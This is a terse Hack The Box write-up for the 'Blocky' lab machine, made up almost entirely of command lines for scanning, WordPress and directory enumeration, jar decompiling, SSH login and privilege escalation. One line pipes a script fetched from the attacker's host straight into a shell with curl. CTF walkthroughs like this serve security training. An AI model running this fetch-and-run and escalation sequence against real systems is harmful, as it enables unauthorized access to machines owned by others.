Hack The Box — Blocky Write-up

Blocky-HTB
Blocky — Easy — Linux

Lets start pwning it ❗️

Reconnaissance

nmap -sC -sV 10.10.10.37 -o nmap.txt

Enumeration

Blocky website
wpscan --url http://blocky.com -e
gobuster dir -u http://blocky.com -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-small.txt -o Bustydirectory.txt  -t 20
sudo apt-get install jd-gui
jar xvf /decompile/BlockyCore.jar
jar xvf /decompile2/griefprevention-1.11.2-3.1.1.298.jar

Gaining a foothold

ssh notch@10.10.10.37

Privilege Escalation

sudo python -m SimpleHTTPServer 80
curl 10.10.14.9/linpeas.sh |sh -a >linpriv.txt
less -r linpriv.txt
sudo su

Lessons Learned

Unlisted

--

--

--

Twitter: https://twitter.com/ShehryaarKhan4

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

How Not To Get Scammed in the NFT Space in 2022

Cybersecurity Risk Management: understand the goals of your CRM program

An Introduction of Jedi Protocol

Recap of the Panther Protocol AMA with Blockchain Space

IBELINK BM-N1 6.6TH/S CKB Eaglesong Miner

The Secure Edge: Daily Round-up of Infosec Blogs #31

Top 3 Reasons Why Digital Marketers Need to Be Cyber-Aware

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store